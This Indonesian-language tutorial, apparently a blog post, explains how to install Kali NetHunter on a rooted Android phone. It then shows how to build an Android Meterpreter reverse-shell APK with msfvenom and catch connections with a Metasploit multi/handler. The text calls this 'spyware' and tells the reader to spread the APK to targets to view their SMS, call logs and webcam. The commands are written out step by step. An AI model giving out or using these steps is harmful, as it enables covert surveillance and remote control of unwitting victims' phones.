Tutorial Menjalankan Metasploit di Android

Tutorial Metasploit /Spyware Mengunakan android  Dengan Kali Net Hunter

[Syarat]                             [Bahan]

- Niat                                 - Device Android

- Root                                - Kali Net Hunter

- Busybox                          - File Os

Note : 

- Internal memory minimal harus kosong 1GB untuk yang mau memasang kalifs-minimal.tar.xz atau HARUS kosong 2GB lebih atau dibawah 3GB untuk yang mau memasang kalifs-full.tar.xz

ok langsung aja pertama download dulu kali nethunternya  di sini

Pilih yang paling atas yaitu oneplus one cm.

lalu buka memakai zarchiver.rootexpoler dan sebagainya yangpenting bisa buat extrak ajj

extract folder /data/app dan /tools yang ada didalam file zipnya keluar, misal ke: /sdcard/nethunter

lalu setelah selesai di extract, pasang file apk nethunter dan nh terminal yang ada di /sdcard/nethunter/app
lalu copy seluruh file yang ada di /sdcard/nethunter/tools ke /system/xbin

timpa yang ada.

Secara logikanya, Nethunter hanya akan bekerja jika system android kita sama dengan system cusrom nethunternya. Kita menyalin file system cusromnya ke dalam system android kita agar nethunter dapat berfungsi seperti di system cusrom nethunternya :)

Ok mari kita mulai memasang kali linuxnya.

jalankan app nethunternya, update appnya yaitu dengan cara swipe dari pojok kiri ke kanan dan pilih Check App Update.

kalo sudah, uninstall dan install apk nethunter yg terbaru.

Jalankan app nethunternya dan keluar.

Buka rootex dan buka folder: /data/data/com.offsec.nethunter/files/scripts/

dan ubah seluruh permisi filenya dengan cara:

di rootex, pilih semua filenya dan pilih menu -> permissions centang seluruh Execute.

dan salin file bootkali_init, bootkali_env, bootkali, bootkali_bash dan bootkali_login ATAU salin seluruh filenya ke /system/bin

Ini berguna agar kita dapat masuk ke kali nethunter terminal nya.

jalankan app nethunternya, swipe dari pojok kiri ke kanan dan pilih Kali Chroot Manager

Untuk yang internal memory nya dibawah 2GB, cara pasangnya adalah:

Pilih INSTALL KALI CHROOT

Download Latest dan pilih yang minimum. Lalu app akan otomatis mendownloadnya, tunggu hingga selesai dan secara otomatis app akan memulai proses decompressnya. Untuk yang mau backup file kalifs-minimum.tar.xz nya, cari di: /sdcard dan copy file kalifs-minimum.tar.xz nya ke suatu tempat, misal ke: /sdcard/nethunter . Ini berguna jika kita ingin memasangnya kembali tanpa harus mendownload lagi karena file kalifs-minimum.tar.xz akan otomatis dihapus jika proses decompressnya selesai .

Untuk yang internalnya lebih dari 2GB, maka extract file kalifs-full.tar.xz yang ada di folder /data/local keluar, extract ke /sdcard . Dan jalankan app nethunternya, pilih kali chroot manager dan pilih use sdcard, pilih yang full dan tunggu hingga proses decompressnya selesai.

nah, setelah proses decompressnya selesai, nanti akan ada pemberitahuan memasang update-an atau upgrade-an kali linux nya, Metapackage Install & Upgrade. Ane terjemahin:
Pilih beberapa "metapackages". Chroot juga akan di upgrade (memakai "apt-get update/dist-upgrade").
Memilih metapackages yang sudah kamu pasang (atau tanpa packages pada semua) sederhananya update/upgrade tanpa menghapus apapun.

Tergantung pada metapackages apa yang kamu pilih, kamu mungkin akan ditanya untuk melakukan stuff (seperti mengatur password untuk layanan), so pay attention.

Nah, pilih sesuai kebutuhan..
untuk tutorial ini kita langsung pilih Install & Update.
Maka secara otomatis nh terminal akan terbuka.
untuk meng-upgrade kali linuxnya, maka perlu mendownload 644MB dan butuh 2043MB untuk mengextractnya. Jadi kita butuh ruang kosong di /data sekitar 3GB
ketik Y dan enter jika ingin memasangnya.

selesai

Sekarang tinggal cara mengunakan dan install Metasploit 

1.Cek IP address terlebih dahulu

2.Buka terminal Net hunternya

3.cd lainya/sdcard Note: 127.0.01 di ganti dengan IP address anda

4.Ketik :

msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=443 R >nama.apk[enter]

5.Tunggu sampe payloadnya dibikin, dan kalo berhasil ada tulisan gede filenya (sekitar 8000kb lah)

  [ini sesi untuk melihat apakah payload kita di install oleh target/melihat target yang masuk ]

6.Ketik:

 msfconsole[enter]

tunggu proses hinggga selesai
7.Ketik:

use exploit/multi/handler [enter]set payload android/meterpreter/reverse_tcp [enter]set lhost 127.0.0.1 [enter]set lport 443 [enter]exploit [enter]

8.Tunggu target menginstall dan membuka file apk yang dibikan pertama tadi (sebarin apk nya biar bisa liat sms/log telpon/webcam)

JIka ada yang akses tinggal nketik "help" / "show options "  tanpa tanda ( " ) kutip

Thanks to Group FA2AS